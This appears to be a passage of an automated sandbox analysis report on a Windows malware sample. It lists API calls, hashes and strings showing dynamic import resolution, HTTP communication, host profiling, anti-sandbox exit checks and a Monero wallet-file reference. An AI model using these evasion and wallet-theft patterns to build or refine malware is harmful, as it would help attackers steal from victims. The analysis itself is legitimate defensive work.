                        • Opcode ID: 131b8a2e5447635b5ee9fbc3956404e2d8f187b69d7b6d84ce3cd6e738fb7c3a
                        • Instruction ID: d7969bd3236d975f61dae5a2a9ddeaa3c2cffdfd157d03fd2aa887e041691e3b
                        • Opcode Fuzzy Hash: 131b8a2e5447635b5ee9fbc3956404e2d8f187b69d7b6d84ce3cd6e738fb7c3a
                        • Instruction Fuzzy Hash: 2A120C71912258AADB55EB91DC92FEEB33ABF14300F51419DB10662092EF703F49CF6A
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006D11B7), ref: 006E7880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E7887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 006E789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: 42c32d53a1117c251bffa1157c88d32d0a47c39f6f571db529be903c2803f66d
                        • Instruction ID: dbb31edb2316b91565102435d2b075c85d558bfbc9892f04c4fd1be329b8866c
                        • Opcode Fuzzy Hash: 42c32d53a1117c251bffa1157c88d32d0a47c39f6f571db529be903c2803f66d
                        • Instruction Fuzzy Hash: A4F04FB1E49248ABC710DF99DD49BAEBBB8EB04711F10425AFA15A2680C7781904CBA2
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 322a9df70df75e3eef6356ca29277dbc770179c89d05c3dc3fd0f69d2099246b
                        • Instruction ID: 800a7988c76eddaca5a7b8dfa33125883a9dc0b3c55f042933f91d965d4dfedf
                        • Opcode Fuzzy Hash: 322a9df70df75e3eef6356ca29277dbc770179c89d05c3dc3fd0f69d2099246b
                        • Instruction Fuzzy Hash: E1D05E74E0530CEBCB00DFE0DC496DDBBB8FB0C321F000595D90562380EA305981CAA6

                        Control-flow Graph

                        • Graph image not reproduced (legend: Executed / Not Executed); basic blocks 6e9c10-6ea709, with 8 calls to LoadLibraryA and 104 calls to GetProcAddress (runtime import resolution)
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,00E35B30), ref: 006E9C2D
                        • GetProcAddress.KERNEL32(74DD0000,00E35B10), ref: 006E9C45
                        • GetProcAddress.KERNEL32(74DD0000,00E49640), ref: 006E9C5E
                        • GetProcAddress.KERNEL32(74DD0000,00E49628), ref: 006E9C76
                        • GetProcAddress.KERNEL32(74DD0000,00E49670), ref: 006E9C8E
                        • GetProcAddress.KERNEL32(74DD0000,00E49688), ref: 006E9CA7
                        • GetProcAddress.KERNEL32(74DD0000,00E3B5E0), ref: 006E9CBF
                        • GetProcAddress.KERNEL32(74DD0000,00E4D188), ref: 006E9CD7
                        • GetProcAddress.KERNEL32(74DD0000,00E4D2D8), ref: 006E9CF0
                        • GetProcAddress.KERNEL32(74DD0000,00E4D338), ref: 006E9D08
                        • GetProcAddress.KERNEL32(74DD0000,00E4D1B8), ref: 006E9D20
                        • GetProcAddress.KERNEL32(74DD0000,00E35BD0), ref: 006E9D39
                        • GetProcAddress.KERNEL32(74DD0000,00E35C70), ref: 006E9D51
                        • GetProcAddress.KERNEL32(74DD0000,00E35BF0), ref: 006E9D69
                        • GetProcAddress.KERNEL32(74DD0000,00E35C10), ref: 006E9D82
                        • GetProcAddress.KERNEL32(74DD0000,00E4D170), ref: 006E9D9A
                        • GetProcAddress.KERNEL32(74DD0000,00E4D0F8), ref: 006E9DB2
                        • GetProcAddress.KERNEL32(74DD0000,00E3B6D0), ref: 006E9DCB
                        • GetProcAddress.KERNEL32(74DD0000,00E35C30), ref: 006E9DE3
                        • GetProcAddress.KERNEL32(74DD0000,00E4D308), ref: 006E9DFB
                        • GetProcAddress.KERNEL32(74DD0000,00E4D2C0), ref: 006E9E14
                        • GetProcAddress.KERNEL32(74DD0000,00E4D140), ref: 006E9E2C
                        • GetProcAddress.KERNEL32(74DD0000,00E4D3B0), ref: 006E9E44
                        • GetProcAddress.KERNEL32(74DD0000,00E35C90), ref: 006E9E5D
                        • GetProcAddress.KERNEL32(74DD0000,00E4D290), ref: 006E9E75
                        • GetProcAddress.KERNEL32(74DD0000,00E4D320), ref: 006E9E8D
                        • GetProcAddress.KERNEL32(74DD0000,00E4D350), ref: 006E9EA6
                        • GetProcAddress.KERNEL32(74DD0000,00E4D3E0), ref: 006E9EBE
                        • GetProcAddress.KERNEL32(74DD0000,00E4D278), ref: 006E9ED6
                        • GetProcAddress.KERNEL32(74DD0000,00E4D3C8), ref: 006E9EEF
                        • GetProcAddress.KERNEL32(74DD0000,00E4D1D0), ref: 006E9F07
                        • GetProcAddress.KERNEL32(74DD0000,00E4D110), ref: 006E9F1F
                        • GetProcAddress.KERNEL32(74DD0000,00E4D158), ref: 006E9F38
                        • GetProcAddress.KERNEL32(74DD0000,00E4A8A0), ref: 006E9F50
                        • GetProcAddress.KERNEL32(74DD0000,00E4D128), ref: 006E9F68
                        • GetProcAddress.KERNEL32(74DD0000,00E4D1A0), ref: 006E9F81
                        • GetProcAddress.KERNEL32(74DD0000,00E35CB0), ref: 006E9F99
                        • GetProcAddress.KERNEL32(74DD0000,00E4D1E8), ref: 006E9FB1
                        • GetProcAddress.KERNEL32(74DD0000,00E35A90), ref: 006E9FCA
                        • GetProcAddress.KERNEL32(74DD0000,00E4D200), ref: 006E9FE2
                        • GetProcAddress.KERNEL32(74DD0000,00E4D218), ref: 006E9FFA
                        • GetProcAddress.KERNEL32(74DD0000,00E356B0), ref: 006EA013
                        • GetProcAddress.KERNEL32(74DD0000,00E35750), ref: 006EA02B
                        • LoadLibraryA.KERNEL32(00E4D230,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA03D
                        • LoadLibraryA.KERNEL32(00E4D380,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA04E
                        • LoadLibraryA.KERNEL32(00E4D248,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA060
                        • LoadLibraryA.KERNEL32(00E4D368,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA072
                        • LoadLibraryA.KERNEL32(00E4D260,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA083
                        • LoadLibraryA.KERNEL32(00E4D2A8,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA095
                        • LoadLibraryA.KERNEL32(00E4D2F0,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA0A7
                        • LoadLibraryA.KERNEL32(00E4D398,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA0B8
                        • GetProcAddress.KERNEL32(75290000,00E35810), ref: 006EA0DA
                        • GetProcAddress.KERNEL32(75290000,00E4D4B8), ref: 006EA0F2
                        • GetProcAddress.KERNEL32(75290000,00E48FF8), ref: 006EA10A
                        • GetProcAddress.KERNEL32(75290000,00E4D4A0), ref: 006EA123
                        • GetProcAddress.KERNEL32(75290000,00E358F0), ref: 006EA13B
                        • GetProcAddress.KERNEL32(6FE30000,00E3B7E8), ref: 006EA160
                        • GetProcAddress.KERNEL32(6FE30000,00E35970), ref: 006EA179
                        • GetProcAddress.KERNEL32(6FE30000,00E3B810), ref: 006EA191
                        • GetProcAddress.KERNEL32(6FE30000,00E4D440), ref: 006EA1A9
                        • GetProcAddress.KERNEL32(6FE30000,00E4D578), ref: 006EA1C2
                        • GetProcAddress.KERNEL32(6FE30000,00E357F0), ref: 006EA1DA
                        • GetProcAddress.KERNEL32(6FE30000,00E357D0), ref: 006EA1F2
                        • GetProcAddress.KERNEL32(6FE30000,00E4D470), ref: 006EA20B
                        • GetProcAddress.KERNEL32(752C0000,00E35730), ref: 006EA22C
                        • GetProcAddress.KERNEL32(752C0000,00E35930), ref: 006EA244
                        • GetProcAddress.KERNEL32(752C0000,00E4D560), ref: 006EA25D
                        • GetProcAddress.KERNEL32(752C0000,00E4D5A8), ref: 006EA275
                        • GetProcAddress.KERNEL32(752C0000,00E35A70), ref: 006EA28D
                        • GetProcAddress.KERNEL32(74EC0000,00E3B608), ref: 006EA2B3
                        • GetProcAddress.KERNEL32(74EC0000,00E3B928), ref: 006EA2CB
                        • GetProcAddress.KERNEL32(74EC0000,00E4D4D0), ref: 006EA2E3
                        • GetProcAddress.KERNEL32(74EC0000,00E358B0), ref: 006EA2FC
                        • GetProcAddress.KERNEL32(74EC0000,00E358D0), ref: 006EA314
                        • GetProcAddress.KERNEL32(74EC0000,00E3B630), ref: 006EA32C
                        • GetProcAddress.KERNEL32(75BD0000,00E4D4E8), ref: 006EA352
                        • GetProcAddress.KERNEL32(75BD0000,00E359B0), ref: 006EA36A
                        • GetProcAddress.KERNEL32(75BD0000,00E48FB8), ref: 006EA382
                        • GetProcAddress.KERNEL32(75BD0000,00E4D530), ref: 006EA39B
                        • GetProcAddress.KERNEL32(75BD0000,00E4D428), ref: 006EA3B3
                        • GetProcAddress.KERNEL32(75BD0000,00E35790), ref: 006EA3CB
                        • GetProcAddress.KERNEL32(75BD0000,00E359F0), ref: 006EA3E4
                        • GetProcAddress.KERNEL32(75BD0000,00E4D410), ref: 006EA3FC
                        • GetProcAddress.KERNEL32(75BD0000,00E4D458), ref: 006EA414
                        • GetProcAddress.KERNEL32(75A70000,00E35770), ref: 006EA436
                        • GetProcAddress.KERNEL32(75A70000,00E4D488), ref: 006EA44E
                        • GetProcAddress.KERNEL32(75A70000,00E4D590), ref: 006EA466
                        • GetProcAddress.KERNEL32(75A70000,00E4D500), ref: 006EA47F
                        • GetProcAddress.KERNEL32(75A70000,00E4D518), ref: 006EA497
                        • GetProcAddress.KERNEL32(75450000,00E35890), ref: 006EA4B8
                        • GetProcAddress.KERNEL32(75450000,00E35830), ref: 006EA4D1
                        • GetProcAddress.KERNEL32(75DA0000,00E357B0), ref: 006EA4F2
                        • GetProcAddress.KERNEL32(75DA0000,00E4D3F8), ref: 006EA50A
                        • GetProcAddress.KERNEL32(6F070000,00E359D0), ref: 006EA530
                        • GetProcAddress.KERNEL32(6F070000,00E356D0), ref: 006EA548
                        • GetProcAddress.KERNEL32(6F070000,00E35910), ref: 006EA560
                        • GetProcAddress.KERNEL32(6F070000,00E4D548), ref: 006EA579
                        • GetProcAddress.KERNEL32(6F070000,00E356F0), ref: 006EA591
                        • GetProcAddress.KERNEL32(6F070000,00E35710), ref: 006EA5A9
                        • GetProcAddress.KERNEL32(6F070000,00E35950), ref: 006EA5C2
                        • GetProcAddress.KERNEL32(6F070000,00E35990), ref: 006EA5DA
                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 006EA5F1
                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 006EA607
                        • GetProcAddress.KERNEL32(75AF0000,00E4D080), ref: 006EA629
                        • GetProcAddress.KERNEL32(75AF0000,00E49028), ref: 006EA641
                        • GetProcAddress.KERNEL32(75AF0000,00E4D038), ref: 006EA659
                        • GetProcAddress.KERNEL32(75AF0000,00E4D0B0), ref: 006EA672
                        • GetProcAddress.KERNEL32(75D90000,00E35850), ref: 006EA693
                        • GetProcAddress.KERNEL32(6CFC0000,00E4CE28), ref: 006EA6B4
                        • GetProcAddress.KERNEL32(6CFC0000,00E35870), ref: 006EA6CD
                        • GetProcAddress.KERNEL32(6CFC0000,00E4CE40), ref: 006EA6E5
                        • GetProcAddress.KERNEL32(6CFC0000,00E4CEE8), ref: 006EA6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: 0W$0X$0Y$0[$0\$HttpQueryInfoA$InternetSetOptionA$PW$PX$PY$pW$pX$pY$pZ$p\
                        • API String ID: 2238633743-1521126475
                        • Opcode ID: 9810b4b7c5ca3dc298414337d6f57f4d47fa04be263a9bc92bb84ae271b30ea5
                        • Instruction ID: 0467df6d4b94f0f1557239e37034b9d173a1f696461ea0ef21897554558e7860
                        • Opcode Fuzzy Hash: 9810b4b7c5ca3dc298414337d6f57f4d47fa04be263a9bc92bb84ae271b30ea5
                        • Instruction Fuzzy Hash: 016240B5B3A200AFC345DFA8EE889E637F9F74C311304C55AA605C32B5D6399D42EB12

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006D4839
                          • Part of subcall function 006D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 006D4849
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • InternetOpenA.WININET(006F0DFE,00000001,00000000,00000000,00000000), ref: 006D62E1
                        • StrCmpCA.SHLWAPI(?,00E4EAE8), ref: 006D6303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006D6335
                        • HttpOpenRequestA.WININET(00000000,GET,?,00E4E248,00000000,00000000,00400100,00000000), ref: 006D6385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006D63BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006D63D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006D63FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006D646D
                        • InternetCloseHandle.WININET(00000000), ref: 006D64EF
                        • InternetCloseHandle.WININET(00000000), ref: 006D64F9
                        • InternetCloseHandle.WININET(00000000), ref: 006D6503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET$H$
                        • API String ID: 3749127164-1196962364
                        • Opcode ID: 38a6ee49866e8ebb06ae5e8e4733ec8b7f2e25db44a88f68d6629ffaf9126673
                        • Instruction ID: a0f43177cc43435bb923130cc94320d38b01688412630d319b6fe6e3c895582d
                        • Opcode Fuzzy Hash: 38a6ee49866e8ebb06ae5e8e4733ec8b7f2e25db44a88f68d6629ffaf9126673
                        • Instruction Fuzzy Hash: 88715C71A11318ABDB24DBA0DC49BEE77BAAB44700F108199F10A6B2D4DBB46E85CF51

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006EA820: lstrlen.KERNEL32(006D4F05,?,?,006D4F05,006F0DDE), ref: 006EA82B
                          • Part of subcall function 006EA820: lstrcpy.KERNEL32(006F0DDE,00000000), ref: 006EA885
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006E5644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006E56A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006E5857
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006E51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006E5228
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006E52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006E5318
                          • Part of subcall function 006E52C0: lstrlen.KERNEL32(00000000), ref: 006E532F
                          • Part of subcall function 006E52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 006E5364
                          • Part of subcall function 006E52C0: lstrlen.KERNEL32(00000000), ref: 006E5383
                          • Part of subcall function 006E52C0: lstrlen.KERNEL32(00000000), ref: 006E53AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006E578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006E5940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006E5A0C
                        • Sleep.KERNEL32(0000EA60), ref: 006E5A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 8d13f69da156dd1cb38653629d87ec7afda1042e55521c25bd8a8cabc8cdd90f
                        • Instruction ID: 4959901e1f3c0cd2704ffa5c795b02552ecfd286569374478dc4726287ee4e23
                        • Opcode Fuzzy Hash: 8d13f69da156dd1cb38653629d87ec7afda1042e55521c25bd8a8cabc8cdd90f
                        • Instruction Fuzzy Hash: 98E13071912348AADB44FBE1DC929FE733BAF54300F51852CB50756191EF346E09CBA6

                        Control-flow Graph

                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 006E17C5
                        • ExitProcess.KERNEL32 ref: 006E17D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 768af8970bd7cbafd58bb77bfc28d5d946e5ecc2edf45dbbf21df31c8eb341e8
                        • Instruction ID: 5cbed7f93ed65060496034ec937d234e04e47c496e687c7e8b45989cfac8e181
                        • Opcode Fuzzy Hash: 768af8970bd7cbafd58bb77bfc28d5d946e5ecc2edf45dbbf21df31c8eb341e8
                        • Instruction Fuzzy Hash: A7516DB4A16349EFDB04DFA2C964AFE77B6BF45704F108048E506AB341D770E942EB62

                        Control-flow Graph

                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 006E7542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006E757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E7603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E760A
                        • wsprintfA.USER32 ref: 006E7640
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\$o
                        • API String ID: 1544550907-1328543574
                        • Opcode ID: a7bb7e362c05e7f085d5bbfa6ae504c20209d691e0874559991c57c4c77795ca
                        • Instruction ID: 7a539a80f74c2dd890a41658a74ac7eea17b5ab31d11858cfe44c9cdf2355083
                        • Opcode Fuzzy Hash: a7bb7e362c05e7f085d5bbfa6ae504c20209d691e0874559991c57c4c77795ca
                        • Instruction Fuzzy Hash: FA41A0B1E05388ABDF10DF95DC45BEEBBB9AF08704F104198F50967280DB78AE44CBA5

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42458), ref: 006E98A1
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42398), ref: 006E98BA
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42470), ref: 006E98D2
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E422A8), ref: 006E98EA
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42380), ref: 006E9903
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E48F48), ref: 006E991B
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E35D30), ref: 006E9933
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E35CF0), ref: 006E994C
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42218), ref: 006E9964
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42500), ref: 006E997C
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E422C0), ref: 006E9995
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E422D8), ref: 006E99AD
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E35B50), ref: 006E99C5
                          • Part of subcall function 006E9860: GetProcAddress.KERNEL32(74DD0000,00E42320), ref: 006E99DE
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006D11D0: ExitProcess.KERNEL32 ref: 006D1211
                          • Part of subcall function 006D1160: GetSystemInfo.KERNEL32(?), ref: 006D116A
                          • Part of subcall function 006D1160: ExitProcess.KERNEL32 ref: 006D117E
                          • Part of subcall function 006D1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006D112B
                          • Part of subcall function 006D1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 006D1132
                          • Part of subcall function 006D1110: ExitProcess.KERNEL32 ref: 006D1143
                          • Part of subcall function 006D1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 006D123E
                          • Part of subcall function 006D1220: __aulldiv.LIBCMT ref: 006D1258
                          • Part of subcall function 006D1220: __aulldiv.LIBCMT ref: 006D1266
                          • Part of subcall function 006D1220: ExitProcess.KERNEL32 ref: 006D1294
                          • Part of subcall function 006E6770: GetUserDefaultLangID.KERNEL32 ref: 006E6774
                          • Part of subcall function 006D1190: ExitProcess.KERNEL32 ref: 006D11C6
                          • Part of subcall function 006E7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006D11B7), ref: 006E7880
                          • Part of subcall function 006E7850: RtlAllocateHeap.NTDLL(00000000), ref: 006E7887
                          • Part of subcall function 006E7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006E789F
                          • Part of subcall function 006E78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E7910
                          • Part of subcall function 006E78E0: RtlAllocateHeap.NTDLL(00000000), ref: 006E7917
                          • Part of subcall function 006E78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006E792F
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E48F98,?,006F110C,?,00000000,?,006F1110,?,00000000,006F0AEF), ref: 006E6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006E6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 006E6AF9
                        • Sleep.KERNEL32(00001770), ref: 006E6B04
                        • CloseHandle.KERNEL32(?,00000000,?,00E48F98,?,006F110C,?,00000000,?,006F1110,?,00000000,006F0AEF), ref: 006E6B1A
                        • ExitProcess.KERNEL32 ref: 006E6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 66f944a522410fc0a57040b2276da9b5bfe338b5af008eda117e3714a177c14c
                        • Instruction ID: 4c06f4f0a94f195adb5e57fc66fd736ee15599269b73ad1c13d410a1a493acb5
                        • Opcode Fuzzy Hash: 66f944a522410fc0a57040b2276da9b5bfe338b5af008eda117e3714a177c14c
                        • Instruction Fuzzy Hash: 26316670D16348AADB44F7F1DC56BEE773BAF14340F01451DF102A6192EF706A05C6AA

                        Control-flow Graph

                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 006D123E
                        • __aulldiv.LIBCMT ref: 006D1258
                        • __aulldiv.LIBCMT ref: 006D1266
                        • ExitProcess.KERNEL32 ref: 006D1294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: de0ebee8f1eeab7780c1163b8fcfdcaee739e875360bb5644cb781515cfa9e08
                        • Instruction ID: 994ca084c27a4feb98da716d768832e92255c5b0aff7d40780a469e759a47275
                        • Opcode Fuzzy Hash: de0ebee8f1eeab7780c1163b8fcfdcaee739e875360bb5644cb781515cfa9e08
                        • Instruction Fuzzy Hash: 470162B0D45348BBEB10DBD4CC49B9DB779AB04701F208059E705BA2C0D7B55781875D

                        Control-flow Graph

                        APIs
